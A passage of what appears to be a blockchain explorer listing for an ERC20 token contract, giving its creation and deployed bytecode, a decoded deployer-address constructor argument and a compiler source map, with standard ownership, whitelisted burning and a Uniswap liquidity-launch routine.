208120601f198616915b828110156200050957888601518255948401946001909101908401620004e8565b5085821015620005285787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b80820180821115620002c857620002c862000538565b8082028115828204841417620002c857620002c862000538565b6000826200059c57634e487b7160e01b600052601260045260246000fd5b500490565b6110aa80620005b16000396000f3fe6080604052600436106101095760003560e01c8063860aefcf11610095578063a9059cbb11610064578063a9059cbb146102c4578063a95e8dee146102e4578063c9567bf914610314578063dd62ed3e1461031c578063f2fde38b1461033c57600080fd5b8063860aefcf146102515780638da5cb5b1461026757806395d89b411461028f578063a457c2d7146102a457600080fd5b8063313ce567116100dc578063313ce567146101a857806339509351146101c457806342966c68146101e457806370a0823114610206578063715018a61461023c57600080fd5b806306fdde031461010e578063095ea7b31461013957806318160ddd1461016957806323b872dd14610188575b600080fd5b34801561011a57600080fd5b5061012361035c565b6040516101309190610e4e565b60405180910390f35b34801561014557600080fd5b50610159610154366004610eb1565b6103ee565b6040519015158152602001610130565b34801561017557600080fd5b506003545b604051908152602001610130565b34801561019457600080fd5b506101596101a3366004610edd565b610408565b3480156101b457600080fd5b5060405160128152602001610130565b3480156101d057600080fd5b506101596101df366004610eb1565b61042c565b3480156101f057600080fd5b506102046101ff366004610f1e565b61044e565b005b34801561021257600080fd5b5061017a610221366004610f37565b6001600160a01b031660009081526001602052604090205490565b34801561024857600080fd5b506102046104bf565b34801561025d57600080fd5b5061017a60075481565b34801561027357600080fd5b506000546040516001600160a01b039091168152602001610130565b34801561029b57600080fd5b506101236104d3565b3480156102b057600080fd5b506101596102bf366004610eb1565b6104e2565b3480156102d057600080fd5b506101596102df366004610eb1565b61055d565b3480156102f057600080fd5b506101596102ff366004610f37565b60066020526000908152604090205460ff1681565b61020461056b565b34801561032857600080fd5b5061017a610337366004610f54565b6107f7565b34801561034857600080fd5b50610204610357366004610f37565b610822565b60606004805461036b90610f8d565b80601f016020809104026020016040519081016040528092919081815260200182805461039790610f8d565b80156103e45780601f106103b9576101008083540402835291602001916103e4565b820191906000526020600020905b8154815290600101906020018083116103c757829003601f168201915b5050505050905090565b6000336103fc818585610898565b60019150505b92915050565b6000336104168582856109bd565b610421858585610a37565b506001949350505050565b6000336103fc81858561043f83836107f7565b6104499190610fdd565b610898565b3360009081526006602052604090205460ff166104b25760405162461bcd60e51b815260206004820152601960248201527f6f6e6c792077686974656c69737465642063616e206275726e0000000000000060448201526064015b60405180910390fd5b6104bc3382610be8565b50565b6104c7610cd2565b6104d16000610d2c565b565b60606005805461036b90610f8d565b600033816104f082866107f7565b9050838110156105505760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104a9565b6104218286868403610898565b6000336103fc818585610a37565b610573610cd2565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d90506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105cc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105f09190610ff0565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561063d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106619190610ff0565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156106ae573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106d29190610ff0565b6001600160a01b0381166000908152600660205260409020805460ff19166001179055905061071b3083610449826001600160a01b031660009081526001602052604090205490565b816001600160a01b031663f305d719343061074b306001600160a01b031660009081526001602052604090205490565b306000908152600160205260409020546040516001600160e01b031960e087901b1681526001600160a01b039093166004840152602483019190915260448201523460648201523360848201524260a482015260c40160606040518083038185885af11580156107bf573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906107e4919061100d565b505043600755506107f36104bf565b5050565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61082a610cd2565b6001600160a01b03811661088f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104a9565b6104bc81610d2c565b6001600160a01b0383166108fa5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104a9565b6001600160a01b03821661095b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104a9565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b60006109c984846107f7565b90506000198114610a315781811015610a245760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016104a9565b610a318484848403610898565b50505050565b6001600160a01b038316610a9b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104a9565b6001600160a01b038216610afd5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104a9565b6001600160a01b03831660009081526001602052604090205481811015610b755760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104a9565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610bd59086815260200190565b60405180910390a3610a31848484610d81565b6001600160a01b038216610c485760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016104a9565b6001600160a01b038216600090815260016020526040902054610c6b8183610e3b565b6001600160a01b038416600090815260016020526040902055600354610c919083610e3b565b6003556040518281526000906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906020016109b0565b6000546001600160a01b031633146104d15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104a9565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b505050565b6001600160a01b03821660009081526006602052604090205460ff16158015610db65750600754610db390600a610fdd565b43105b15610d7c576064610dc660035490565b610dd190600361103b565b610ddb9190611052565b81610dfb846001600160a01b031660009081526001602052604090205490565b610e059190610fdd565b10610d7c5760405162461bcd60e51b81526004016104a990602080825260049082015263042dac2f60e31b604082015260600190565b6000610e478284610fdd565b9392505050565b600060208083528351808285015260005b81811015610e7b57858101830151858201604001528201610e5f565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146104bc57600080fd5b60008060408385031215610ec457600080fd5b8235610ecf81610e9c565b946020939093013593505050565b600080600060608486031215610ef257600080fd5b8335610efd81610e9c565b92506020840135610f0d81610e9c565b929592945050506040919091013590565b600060208284031215610f3057600080fd5b5035919050565b600060208284031215610f4957600080fd5b8135610e4781610e9c565b60008060408385031215610f6757600080fd5b8235610f7281610e9c565b91506020830135610f8281610e9c565b809150509250929050565b600181811c90821680610fa157607f821691505b602082108103610fc157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561040257610402610fc7565b60006020828403121561100257600080fd5b8151610e4781610e9c565b60008060006060848603121561102257600080fd5b8351925060208401519150604084015190509250925092565b808202811582820484141761040257610402610fc7565b60008261106f57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220d238cf4f49cd36868a8353c4f3f7ef98657495dc2ee47e5f131ce0a99e877e3a64736f6c634300081300330000000000000000000000009b3402064330f503cbf4d8951ff590807e73fe47

Deployed Bytecode

0x6080604052600436106101095760003560e01c8063860aefcf11610095578063a9059cbb11610064578063a9059cbb146102c4578063a95e8dee146102e4578063c9567bf914610314578063dd62ed3e1461031c578063f2fde38b1461033c57600080fd5b8063860aefcf146102515780638da5cb5b1461026757806395d89b411461028f578063a457c2d7146102a457600080fd5b8063313ce567116100dc578063313ce567146101a857806339509351146101c457806342966c68146101e457806370a0823114610206578063715018a61461023c57600080fd5b806306fdde031461010e578063095ea7b31461013957806318160ddd1461016957806323b872dd14610188575b600080fd5b34801561011a57600080fd5b5061012361035c565b6040516101309190610e4e565b60405180910390f35b34801561014557600080fd5b50610159610154366004610eb1565b6103ee565b6040519015158152602001610130565b34801561017557600080fd5b506003545b604051908152602001610130565b34801561019457600080fd5b506101596101a3366004610edd565b610408565b3480156101b457600080fd5b5060405160128152602001610130565b3480156101d057600080fd5b506101596101df366004610eb1565b61042c565b3480156101f057600080fd5b506102046101ff366004610f1e565b61044e565b005b34801561021257600080fd5b5061017a610221366004610f37565b6001600160a01b031660009081526001602052604090205490565b34801561024857600080fd5b506102046104bf565b34801561025d57600080fd5b5061017a60075481565b34801561027357600080fd5b506000546040516001600160a01b039091168152602001610130565b34801561029b57600080fd5b506101236104d3565b3480156102b057600080fd5b506101596102bf366004610eb1565b6104e2565b3480156102d057600080fd5b506101596102df366004610eb1565b61055d565b3480156102f057600080fd5b506101596102ff366004610f37565b60066020526000908152604090205460ff1681565b61020461056b565b34801561032857600080fd5b5061017a610337366004610f54565b6107f7565b34801561034857600080fd5b50610204610357366004610f37565b610822565b60606004805461036b90610f8d565b80601f016020809104026020016040519081016040528092919081815260200182805461039790610f8d565b80156103e45780601f106103b9576101008083540402835291602001916103e4565b820191906000526020600020905b8154815290600101906020018083116103c757829003601f168201915b5050505050905090565b6000336103fc818585610898565b60019150505b92915050565b6000336104168582856109bd565b610421858585610a37565b506001949350505050565b6000336103fc81858561043f83836107f7565b6104499190610fdd565b610898565b3360009081526006602052604090205460ff166104b25760405162461bcd60e51b815260206004820152601960248201527f6f6e6c792077686974656c69737465642063616e206275726e0000000000000060448201526064015b60405180910390fd5b6104bc3382610be8565b50565b6104c7610cd2565b6104d16000610d2c565b565b60606005805461036b90610f8d565b600033816104f082866107f7565b9050838110156105505760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104a9565b6104218286868403610898565b6000336103fc818585610a37565b610573610cd2565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d90506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105cc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105f09190610ff0565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561063d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106619190610ff0565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156106ae573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106d29190610ff0565b6001600160a01b0381166000908152600660205260409020805460ff19166001179055905061071b3083610449826001600160a01b031660009081526001602052604090205490565b816001600160a01b031663f305d719343061074b306001600160a01b031660009081526001602052604090205490565b306000908152600160205260409020546040516001600160e01b031960e087901b1681526001600160a01b039093166004840152602483019190915260448201523460648201523360848201524260a482015260c40160606040518083038185885af11580156107bf573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906107e4919061100d565b505043600755506107f36104bf565b5050565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61082a610cd2565b6001600160a01b03811661088f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104a9565b6104bc81610d2c565b6001600160a01b0383166108fa5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104a9565b6001600160a01b03821661095b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104a9565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b60006109c984846107f7565b90506000198114610a315781811015610a245760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016104a9565b610a318484848403610898565b50505050565b6001600160a01b038316610a9b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104a9565b6001600160a01b038216610afd5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104a9565b6001600160a01b03831660009081526001602052604090205481811015610b755760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104a9565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610bd59086815260200190565b60405180910390a3610a31848484610d81565b6001600160a01b038216610c485760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016104a9565b6001600160a01b038216600090815260016020526040902054610c6b8183610e3b565b6001600160a01b038416600090815260016020526040902055600354610c919083610e3b565b6003556040518281526000906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906020016109b0565b6000546001600160a01b031633146104d15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104a9565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b505050565b6001600160a01b03821660009081526006602052604090205460ff16158015610db65750600754610db390600a610fdd565b43105b15610d7c576064610dc660035490565b610dd190600361103b565b610ddb9190611052565b81610dfb846001600160a01b031660009081526001602052604090205490565b610e059190610fdd565b10610d7c5760405162461bcd60e51b81526004016104a990602080825260049082015263042dac2f60e31b604082015260600190565b6000610e478284610fdd565b9392505050565b600060208083528351808285015260005b81811015610e7b57858101830151858201604001528201610e5f565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146104bc57600080fd5b60008060408385031215610ec457600080fd5b8235610ecf81610e9c565b946020939093013593505050565b600080600060608486031215610ef257600080fd5b8335610efd81610e9c565b92506020840135610f0d81610e9c565b929592945050506040919091013590565b600060208284031215610f3057600080fd5b5035919050565b600060208284031215610f4957600080fd5b8135610e4781610e9c565b60008060408385031215610f6757600080fd5b8235610f7281610e9c565b91506020830135610f8281610e9c565b809150509250929050565b600181811c90821680610fa157607f821691505b602082108103610fc157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561040257610402610fc7565b60006020828403121561100257600080fd5b8151610e4781610e9c565b60008060006060848603121561102257600080fd5b8351925060208401519150604084015190509250925092565b808202811582820484141761040257610402610fc7565b60008261106f57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220d238cf4f49cd36868a8353c4f3f7ef98657495dc2ee47e5f131ce0a99e877e3a64736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000009b3402064330f503cbf4d8951ff590807e73fe47

-----Decoded View---------------
Arg [0] : deployer (address): 0x9B3402064330f503cBF4D8951FF590807e73FE47

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000009b3402064330f503cbf4d8951ff590807e73fe47


Deployed Bytecode Sourcemap

281:1640:7:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;996:98:4;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3340:219;;;;;;;;;;-1:-1:-1;3340:219:4;;;;;:::i;:::-;;:::i;:::-;;;1188:14:9;;1181:22;1163:41;;1151:2;1136:18;3340:219:4;1023:187:9;2093:106:4;;;;;;;;;;-1:-1:-1;2180:12:4;;2093:106;;;1361:25:9;;;1349:2;1334:18;2093:106:4;1215:177:9;4121:286:4;;;;;;;;;;-1:-1:-1;4121:286:4;;;;;:::i;:::-;;:::i;1942:91::-;;;;;;;;;;-1:-1:-1;1942:91:4;;2024:2;2000:36:9;;1988:2;1973:18;1942:91:4;1858:184:9;4802:256:4;;;;;;;;;;-1:-1:-1;4802:256:4;;;;;:::i;:::-;;:::i;1772:147:7:-;;;;;;;;;;-1:-1:-1;1772:147:7;;;;;:::i;:::-;;:::i;:::-;;2257:139:4;;;;;;;;;;-1:-1:-1;2257:139:4;;;;;:::i;:::-;-1:-1:-1;;;;;2371:18:4;2345:7;2371:18;;;:9;:18;;;;;;;2257:139;1824:101:0;;;;;;;;;;;;;:::i;361:21:7:-;;;;;;;;;;;;;;;;1201:85:0;;;;;;;;;;-1:-1:-1;1247:7:0;1273:6;1201:85;;-1:-1:-1;;;;;1273:6:0;;;2630:51:9;;2618:2;2603:18;1201:85:0;2484:203:9;1207:102:4;;;;;;;;;;;;;:::i;5545:483::-;;;;;;;;;;-1:-1:-1;5545:483:4;;;;;:::i;:::-;;:::i;2592:211::-;;;;;;;;;;-1:-1:-1;2592:211:4;;;;;:::i;:::-;;:::i;317:38:7:-;;;;;;;;;;-1:-1:-1;317:38:7;;;;;:::i;:::-;;;;;;;;;;;;;;;;687:814;;;:::i;2861:171:4:-;;;;;;;;;;-1:-1:-1;2861:171:4;;;;;:::i;:::-;;:::i;2074:198:0:-;;;;;;;;;;-1:-1:-1;2074:198:0;;;;;:::i;:::-;;:::i;996:98:4:-;1050:13;1082:5;1075:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;996:98;:::o;3340:219::-;3445:4;719:10:3;3499:32:4;719:10:3;3515:7:4;3524:6;3499:8;:32::i;:::-;3548:4;3541:11;;;3340:219;;;;;:::o;4121:286::-;4248:4;719:10:3;4304:38:4;4320:4;719:10:3;4335:6:4;4304:15;:38::i;:::-;4352:27;4362:4;4368:2;4372:6;4352:9;:27::i;:::-;-1:-1:-1;4396:4:4;;4121:286;-1:-1:-1;;;;4121:286:4:o;4802:256::-;4912:4;719:10:3;4966:64:4;719:10:3;4982:7:4;5019:10;4991:25;719:10:3;4982:7:4;4991:9;:25::i;:::-;:38;;;;:::i;:::-;4966:8;:64::i;1772:147:7:-;1836:10;1829:18;;;;:6;:18;;;;;;;;1821:56;;;;-1:-1:-1;;;1821:56:7;;3934:2:9;1821:56:7;;;3916:21:9;3973:2;3953:18;;;3946:30;4012:27;3992:18;;;3985:55;4057:18;;1821:56:7;;;;;;;;;1887:25;1893:10;1905:6;1887:5;:25::i;:::-;1772:147;:::o;1824:101:0:-;1094:13;:11;:13::i;:::-;1888:30:::1;1915:1;1888:18;:30::i;:::-;1824:101::o:0;1207:102:4:-;1263:13;1295:7;1288:14;;;;;:::i;5545:483::-;5660:4;719:10:3;5660:4:4;5741:25;719:10:3;5758:7:4;5741:9;:25::i;:::-;5714:52;;5817:15;5797:16;:35;;5776:119;;;;-1:-1:-1;;;5776:119:4;;4288:2:9;5776:119:4;;;4270:21:9;4327:2;4307:18;;;4300:30;4366:34;4346:18;;;4339:62;-1:-1:-1;;;4417:18:9;;;4410:35;4462:19;;5776:119:4;4086:401:9;5776:119:4;5929:60;5938:5;5945:7;5973:15;5954:16;:34;5929:8;:60::i;2592:211::-;2693:4;719:10:3;2747:28:4;719:10:3;2764:2:4;2768:6;2747:9;:28::i;687:814:7:-;1094:13:0;:11;:13::i;:::-;747:34:7::1;816:42;747:121;;879:12;912:15;-1:-1:-1::0;;;;;912:23:7::1;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;894:55:7::1;;971:4;990:15;-1:-1:-1::0;;;;;990:20:7::1;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;894:128;::::0;-1:-1:-1;;;;;;894:128:7::1;::::0;;;;;;-1:-1:-1;;;;;4978:15:9;;;894:128:7::1;::::0;::::1;4960:34:9::0;5030:15;;5010:18;;;5003:43;4895:18;;894:128:7::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;1033:12:7;::::1;;::::0;;;:6:::1;:12;::::0;;;;:19;;-1:-1:-1;;1033:19:7::1;1048:4;1033:19;::::0;;879:143;-1:-1:-1;1063:121:7::1;1093:4;1120:15:::0;1150:24:::1;1093:4:::0;-1:-1:-1;;;;;2371:18:4;2345:7;2371:18;;;:9;:18;;;;;;;2257:139;1063:121:7::1;1195:15;-1:-1:-1::0;;;;;1195:31:7::1;;1234:9;1266:4;1285:24;1303:4;-1:-1:-1::0;;;;;2371:18:4;2345:7;2371:18;;;:9;:18;;;;;;;2257:139;1285:24:7::1;1341:4;2345:7:4::0;2371:18;;;:9;:18;;;;;;1195:238:7::1;::::0;-1:-1:-1;;;;;;1195:238:7::1;::::0;;;;;;-1:-1:-1;;;;;5400:15:9;;;1195:238:7::1;::::0;::::1;5382:34:9::0;5432:18;;;5425:34;;;;5475:18;;;5468:34;1361:9:7::1;5518:18:9::0;;;5511:34;1384:10:7::1;5561:19:9::0;;;5554:44;1408:15:7::1;5614:19:9::0;;;5607:35;5316:19;;1195:238:7::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;1453:12:7::1;1444:6;:21:::0;-1:-1:-1;1475:19:7::1;:17;:19::i;:::-;737:764;;687:814::o:0;2861:171:4:-;-1:-1:-1;;;;;2998:18:4;;;2972:7;2998:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;2861:171::o;2074:198:0:-;1094:13;:11;:13::i;:::-;-1:-1:-1;;;;;2162:22:0;::::1;2154:73;;;::::0;-1:-1:-1;;;2154:73:0;;6166:2:9;2154:73:0::1;::::0;::::1;6148:21:9::0;6205:2;6185:18;;;6178:30;6244:34;6224:18;;;6217:62;-1:-1:-1;;;6295:18:9;;;6288:36;6341:19;;2154:73:0::1;5964:402:9::0;2154:73:0::1;2237:28;2256:8;2237:18;:28::i;9407:370:4:-:0;-1:-1:-1;;;;;9538:19:4;;9530:68;;;;-1:-1:-1;;;9530:68:4;;6573:2:9;9530:68:4;;;6555:21:9;6612:2;6592:18;;;6585:30;6651:34;6631:18;;;6624:62;-1:-1:-1;;;6702:18:9;;;6695:34;6746:19;;9530:68:4;6371:400:9;9530:68:4;-1:-1:-1;;;;;9616:21:4;;9608:68;;;;-1:-1:-1;;;9608:68:4;;6978:2:9;9608:68:4;;;6960:21:9;7017:2;6997:18;;;6990:30;7056:34;7036:18;;;7029:62;-1:-1:-1;;;7107:18:9;;;7100:32;7149:19;;9608:68:4;6776:398:9;9608:68:4;-1:-1:-1;;;;;9687:18:4;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;9738:32;;1361:25:9;;;9738:32:4;;1334:18:9;9738:32:4;;;;;;;;9407:370;;;:::o;10058:487::-;10188:24;10215:25;10225:5;10232:7;10215:9;:25::i;:::-;10188:52;;-1:-1:-1;;10254:16:4;:37;10250:289;;10352:6;10332:16;:26;;10307:114;;;;-1:-1:-1;;;10307:114:4;;7381:2:9;10307:114:4;;;7363:21:9;7420:2;7400:18;;;7393:30;7459:31;7439:18;;;7432:59;7508:18;;10307:114:4;7179:353:9;10307:114:4;10463:51;10472:5;10479:7;10507:6;10488:16;:25;10463:8;:51::i;:::-;10178:367;10058:487;;;:::o;6482:852::-;-1:-1:-1;;;;;6608:18:4;;6600:68;;;;-1:-1:-1;;;6600:68:4;;7739:2:9;6600:68:4;;;7721:21:9;7778:2;7758:18;;;7751:30;7817:34;7797:18;;;7790:62;-1:-1:-1;;;7868:18:9;;;7861:35;7913:19;;6600:68:4;7537:401:9;6600:68:4;-1:-1:-1;;;;;6686:16:4;;6678:64;;;;-1:-1:-1;;;6678:64:4;;8145:2:9;6678:64:4;;;8127:21:9;8184:2;8164:18;;;8157:30;8223:34;8203:18;;;8196:62;-1:-1:-1;;;8274:18:9;;;8267:33;8317:19;;6678:64:4;7943:399:9;6678:64:4;-1:-1:-1;;;;;6824:15:4;;6802:19;6824:15;;;:9;:15;;;;;;6870:21;;;;6849:106;;;;-1:-1:-1;;;6849:106:4;;8549:2:9;6849:106:4;;;8531:21:9;8588:2;8568:18;;;8561:30;8627:34;8607:18;;;8600:62;-1:-1:-1;;;8678:18:9;;;8671:36;8724:19;;6849:106:4;8347:402:9;6849:106:4;-1:-1:-1;;;;;6989:15:4;;;;;;;:9;:15;;;;;;7007:20;;;6989:38;;7204:13;;;;;;;;;;:23;;;;;;7253:26;;;;;;7021:6;1361:25:9;;1349:2;1334:18;;1215:177;7253:26:4;;;;;;;;7290:37;7310:4;7316:2;7320:6;7290:19;:37::i;8505:479::-;-1:-1:-1;;;;;8588:21:4;;8580:67;;;;-1:-1:-1;;;8580:67:4;;8956:2:9;8580:67:4;;;8938:21:9;8995:2;8975:18;;;8968:30;9034:34;9014:18;;;9007:62;-1:-1:-1;;;9085:18:9;;;9078:31;9126:19;;8580:67:4;8754:397:9;8580:67:4;-1:-1:-1;;;;;8683:18:4;;8658:22;8683:18;;;:9;:18;;;;;;8756:26;8683:18;8775:6;8756:18;:26::i;:::-;-1:-1:-1;;;;;8735:18:4;;;;;;:9;:18;;;;;:47;8890:12;;:24;;8907:6;8890:16;:24::i;:::-;8875:12;:39;8940:37;;1361:25:9;;;8966:1:4;;-1:-1:-1;;;;;8940:37:4;;;;;1349:2:9;1334:18;8940:37:4;1215:177:9;1359:130:0;1247:7;1273:6;-1:-1:-1;;;;;1273:6:0;719:10:3;1422:23:0;1414:68;;;;-1:-1:-1;;;1414:68:0;;9358:2:9;1414:68:0;;;9340:21:9;;;9377:18;;;9370:30;9436:34;9416:18;;;9409:62;9488:18;;1414:68:0;9156:356:9;2426:187:0;2499:16;2518:6;;-1:-1:-1;;;;;2534:17:0;;;-1:-1:-1;;;;;;2534:17:0;;;;;;2566:40;;2518:6;;;;;;;2566:40;;2499:16;2566:40;2489:124;2426:187;:::o;11129:121:4:-;;;;:::o;1507:259:7:-;-1:-1:-1;;;;;1641:10:7;;;;;;:6;:10;;;;;;;;1640:11;:41;;;;-1:-1:-1;1670:6:7;;:11;;1679:2;1670:11;:::i;:::-;1655:12;:26;1640:41;1636:123;;;1747:3;1726:13;2180:12:4;;;2093:106;1726:13:7;:17;;1742:1;1726:17;:::i;:::-;1725:25;;;;:::i;:::-;1719:3;1703:13;1713:2;-1:-1:-1;;;;;2371:18:4;2345:7;2371:18;;;:9;:18;;;;;;;2257:139;1703:13:7;:19;;;;:::i;:::-;:47;1695:64;;;;-1:-1:-1;;;1695:64:7;;;;;;10114:2:9;10096:21;;;10153:1;10133:18;;;10126:29;-1:-1:-1;;;10186:2:9;10171:18;;10164:34;10230:2;10215:18;;9912:327;3232:96:8;3290:7;3316:5;3320:1;3316;:5;:::i;:::-;3309:12;3232:96;-1:-1:-1;;;3232:96:8:o;14:548:9:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:9;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:9:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:9;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:9;1828:18;;;;1815:32;;1397:456::o;2047:180::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;-1:-1:-1;2198:23:9;;2047:180;-1:-1:-1;2047:180:9:o;2232:247::-;2291:6;2344:2;2332:9;2323:7;2319:23;2315:32;2312:52;;;2360:1;2357;2350:12;2312:52;2399:9;2386:23;2418:31;2443:5;2418:31;:::i;2692:388::-;2760:6;2768;2821:2;2809:9;2800:7;2796:23;2792:32;2789:52;;;2837:1;2834;2827:12;2789:52;2876:9;2863:23;2895:31;2920:5;2895:31;:::i;:::-;2945:5;-1:-1:-1;3002:2:9;2987:18;;2974:32;3015:33;